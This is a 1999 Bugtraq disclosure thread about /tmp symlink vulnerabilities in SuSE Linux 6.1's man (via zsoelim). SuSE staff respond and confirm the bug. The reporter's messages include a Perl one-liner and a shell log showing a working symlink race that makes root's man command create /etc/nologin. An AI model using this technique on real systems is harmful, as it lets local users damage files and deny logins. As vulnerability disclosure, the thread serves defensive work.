Date: Wed, 2 Jun 1999 11:01:32 +0200 From: Thomas Fischbacher To: BUGTRAQ@netspace.org Subject: /tmp symlink problems in SuSE Linux 6.1 I notified SuSE GmbH several weeks ago about this problem, but didn't get any response, therefore this post to Bugtraq. With SuSE Linux 6.1 there are still a few programs around which blindly create files in /tmp regardless of whether a symlink or something similarly evil already exists in that place. Among these programs are 'man'and 'dvips'. Though it seems to be impossible by now to overwrite /etc/passwd with a plain simple /tmp/zman01234aaa symlink (didn't check if the source is race-condition free, though), one can still create arbitrary files which do funny things. Example: perl -e 'for($i=1000;$i<5000;$i++){symlink "/etc/nologin", "/tmp/zman0${i}aaa";}' -- regards, tf@cip.physik.uni-muenchen.de (o_ Thomas Fischbacher - http://www.cip.physik.uni-muenchen.de/~tf //\ (lambda (n) ((lambda (p q r) (p p q r)) (lambda (g x y) V_/_ (if (= x 0) y (g g (- x 1) (* x y)))) n 1)) ------------------------------------------------------------------------------- Date: Fri, 4 Jun 1999 09:52:36 +0200 From: Thomas Biege To: BUGTRAQ@netspace.org Subject: Re: /tmp symlink problems in SuSE Linux 6.1 Hi, we at SuSE could not reproduce this problem neither for man nor for dvips. Please send us a full list of "maybe" buggy tools, so we could evaluate them. Bye, Thomas PS: I never saw your email at your mailinglists. -- Thomas Biege, SuSE GmbH, Schanzaeckerstr. 10, 90443 Nuernberg E@mail: thomas@suse.de Function: Security Support & Auditing "lynx -source http://www.suse.de/~thomas/thomas.pgp | pgp -fka" Key fingerprint = E3 42 DA D1 3B 9C 23 D0 93 1F B8 2E 6B 9A 45 82 ------------------------------------------------------------------------------- Date: Fri, 4 Jun 1999 16:36:46 +0200 From: Thomas Fischbacher To: BUGTRAQ@netspace.org Subject: Re: /tmp symlink problems in SuSE Linux 6.1 > Hi, > we at SuSE could not reproduce this problem neither for > man nor for dvips. Ok, here is a log of what I just did five minutes ago: (emacs -- M-x shell, btw.) brauneck:~ # whoami root brauneck:~ # cd /tmp brauneck:/tmp # cat /etc/SuSE-release SuSE Linux 6.1 (i386) VERSION = 6.1 brauneck:/tmp # rpm -q man man-2.3.10-62 brauneck:/tmp # md5sum /usr/bin/man b383967ce695352002f077680e375c62 /usr/bin/man brauneck:/tmp # su tf tf@brauneck:/tmp > export LS_OPTIONS='' tf@brauneck:/tmp > export LS_COLORS='' tf@brauneck:/tmp > ls zman* ls: zman*: No such file or directory tf@brauneck:/tmp > /bin/bash -c "echo $$" 6056 tf@brauneck:/tmp > # this gives me a current pid range tf@brauneck:/tmp > perl -e 'for($i=6000;$i<7000;$i++){symlink "/etc/nologin", "/tmp/zman0${i}aaa";}' tf@brauneck:/tmp > ls -l /tmp/zman06123aaa lrwxrwxrwx 1 tf stud 12 Jun 4 16:28 /tmp/zman06123aaa -> /etc/nologin tf@brauneck:/tmp > ls -l /etc/nologin ls: /etc/nologin: No such file or directory tf@brauneck:/tmp > exit brauneck:/tmp # man mmap Reformatting mmap(2), please wait... WARNING: terminal is not fully functional MMAP(2) Linux Programmer's Manual MMAP(2) NAME mmap, munmap - map or unmap files or devices into memory SYNOPSIS #include #include #ifdef _POSIX_MAPPED_FILES void * mmap(void *start, size_t length, int prot , int flags, int fd, off_t offset); int munmap(void *start, size_t length); #endif DESCRIPTION brauneck:/tmp # ls -la /etc/nologin -rw-r--r-- 1 root root 4319 Jun 4 16:30 /etc/nologin brauneck:/tmp # ls /tmp/zman0* | wc -l 999 brauneck:/tmp # # Note that one link was removed! brauneck:/tmp # You see -- the problem definitely is not fiction! Come over to Munich and see yourself if you want. > Please send us a full list of "maybe" buggy tools, so we > could evaluate them. ? > PS: I never saw your email at your mailinglists. ? -- regards, tf@cip.physik.uni-muenchen.de (o_ Thomas Fischbacher - http://www.cip.physik.uni-muenchen.de/~tf //\ (lambda (n) ((lambda (p q r) (p p q r)) (lambda (g x y) V_/_ (if (= x 0) y (g g (- x 1) (* x y)))) n 1)) ------------------------------------------------------------------------------- Date: Sat, 5 Jun 1999 07:13:28 +0200 From: Thomas Biege To: BUGTRAQ@netspace.org Subject: Re: /tmp symlink problems in SuSE Linux 6.1 On Fri, 4 Jun 1999, Thomas Fischbacher wrote: > > we at SuSE could not reproduce this problem neither for > > man nor for dvips. > > Ok, here is a log of what I just did five minutes ago: > (emacs -- M-x shell, btw.) [...] > You see -- the problem definitely is not fiction! Come over to Munich and > see yourself if you want. I don't think it's a fiction... ... the fact is, that just old releases of SuSE 6.1 seem to be vulnerable, the newer releases didn't - man uses open(O_EXCL) and drops it's privileges. A customer told me, that the behavior you described just happens when he opens a big man page for the first time... we will check this as soon as posible. > > Please send us a full list of "maybe" buggy tools, so we > > could evaluate them. > ? In your first post to bugtraq you mentioned, that more tools have /tmp symlink problems... feel free to tell us about them. (BTW, I strace'd dvips on my SuSE 6.0 and it never touched /tmp.) Bye, Thomas -- Thomas Biege, SuSE GmbH, Schanzaeckerstr. 10, 90443 Nuernberg E@mail: thomas@suse.de Function: Security Support & Auditing "lynx -source http://www.suse.de/~thomas/thomas.pgp | pgp -fka" Key fingerprint = E3 42 DA D1 3B 9C 23 D0 93 1F B8 2E 6B 9A 45 82 ------------------------------------------------------------------------------- Date: Sat, 5 Jun 1999 22:02:19 +0200 From: Marc Heuse To: BUGTRAQ@netspace.org Subject: Re: /tmp symlink problems in SuSE Linux 6.1 Hi, we confirmed the link vulnerablity in the man package. The culprit is zsoelim which creates the file without looking left and right. :-( All linux distributions using man 2.3.10 should be affected. A fixed package from us will be available soon. Greets, Marc -- Marc Heuse, SuSE GmbH, Schanzaeckerstr. 10, 90443 Nuernberg E@mail: marc@suse.de Function: Security Support & Auditing "lynx -source http://www.suse.de/~marc/marc.pgp | pgp -fka" Key fingerprint = B5 07 B6 4E 9C EF 27 EE 16 D9 70 D4 87 B5 63 6C